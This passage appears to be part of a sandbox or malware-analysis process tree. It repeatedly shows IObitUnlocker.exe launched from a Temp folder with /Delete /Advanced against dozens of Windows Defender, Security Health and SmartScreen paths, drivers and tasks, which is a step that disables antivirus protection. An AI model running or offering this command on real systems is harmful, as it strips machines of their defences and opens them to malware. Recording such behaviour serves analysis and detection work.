Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7192
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7776
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8140
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7972
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7808
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6276
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7616
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 